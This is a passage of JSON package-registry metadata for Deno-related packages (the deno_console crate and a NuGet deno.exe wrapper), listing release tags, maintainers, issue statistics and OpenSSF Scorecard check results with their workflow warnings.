ependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-09-08T00:46:01.427Z","dependent_packages_count":21,"downloads":1468593,"downloads_period":"total","dependent_repos_count":48,"rankings":{"downloads":3.9349360124387034,"dependent_repos_count":4.3307881570780085,"dependent_packages_count":1.9308396124865446,"stargazers_count":0.002243493867783428,"forks_count":0.05758300927310799,"docker_downloads_count":3.2541368682486014,"average":2.2517545255654583},"purl":"pkg:cargo/deno_console","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_console","docker_dependents_count":30,"docker_downloads_count":23282372,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_console","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_console/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-09-07T13:25:49.747Z","issues_count":6659,"pull_requests_count":9671,"avg_time_to_close_issue":17134708.21400472,"avg_time_to_close_pull_request":1530358.8397069778,"issues_closed_count":3811,"pull_requests_closed_count":8053,"pull_request_authors_count":591,"issue_authors_count":2494,"avg_comments_per_issue":2.5029283676227663,"avg_comments_per_pull_request":0.7209182090786889,"merged_pull_requests_count":7031,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":681,"past_year_pull_requests_count":1194,"past_year_avg_time_to_close_issue":1348806.688034188,"past_year_avg_time_to_close_pull_request":1303670.810240964,"past_year_issues_closed_count":234,"past_year_pull_requests_closed_count":664,"past_year_pull_request_authors_count":193,"past_year_issue_authors_count":377,"past_year_avg_comments_per_issue":1.234948604992658,"past_year_avg_comments_per_pull_request":1.134003350083752,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":2,"past_year_merged_pull_requests_count":497,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1803,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1731,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":290,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":285,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":268,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":149,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":396,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":183,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"crowlKats","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"denobot","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"devsnek","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_console/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_console/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_console/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_console/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_console/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_console/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2022-11-07T18:29:22.553Z","updated_at":"2022-11-07T18:29:22.553Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2023-07-18T22:41:28.826Z","updated_at":"2023-07-18T22:41:28.826Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":338199,"maintainers_count":71476,"namespaces_count":0,"keywords_count":71845,"github":"rust-lang","metadata":{"funded_packages_count":30558,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-04T05:05:22.166Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":13837793,"name":"ytdlp.deno.runtime","ecosystem":"nuget","description":"A NuGet package that provides the latest version of `deno.exe`.","homepage":"https://github.com/denoland/deno","licenses":"mit","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":["yt-dlp","deno","deno.exe","runtime","javascript","youtube","youtube-dl","external-runtime"],"namespace":null,"versions_count":2,"first_release_published_at":"1900-01-01T00:00:00.000Z","latest_release_published_at":"2026-09-07T23:01:43.544Z","latest_release_number":null,"last_synced_at":"2026-09-07T23:01:44.409Z","created_at":"2026-02-15T13:33:44.094Z","updated_at":"2026-09-08T02:36:47.155Z","registry_url":"https://www.nuget.org/packages/ytdlp.deno.runtime/","install_command":"Install-Package ytdlp.deno.runtime","documentation_url":null,"metadata":{"copyright":"Copyright © 2026 ManuHub","license_info":{"type":"file","text":"LICENSE.txt","version":null},"license_url":"https://aka.ms/deprecateLicenseUrl","require_license_acceptance":false,"icon":"icon.png","readme":"README.md","repository":{"type":"git","url":"https://github.com/manusoft/Ytdlp-Builds","branch":null,"commit":"766964df63d0a7faefb11582ef932608e4ccc713"},"development_dependency":true,"serviceable":false,"framework_assemblies":[],"package_types":[],"dependency_summary":{"total_dependency_groups":1,"target_frameworks":[".NETStandard2.1"],"total_dependencies":0}},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-09-04T18:13:25.000Z","size":249845,"stargazers_count":108384,"open_issues_count":1549,"forks_count":6373,"subscribers_count":1430,"default_branch":"main","last_synced_at":"2026-09-06T18:12:48.927Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-09-06T18:00:40.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: 